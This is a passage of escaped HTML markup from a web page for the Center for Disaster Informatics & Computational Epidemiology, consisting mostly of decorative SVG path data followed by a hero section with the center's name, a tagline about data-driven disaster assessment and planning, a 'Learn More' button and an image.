d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n 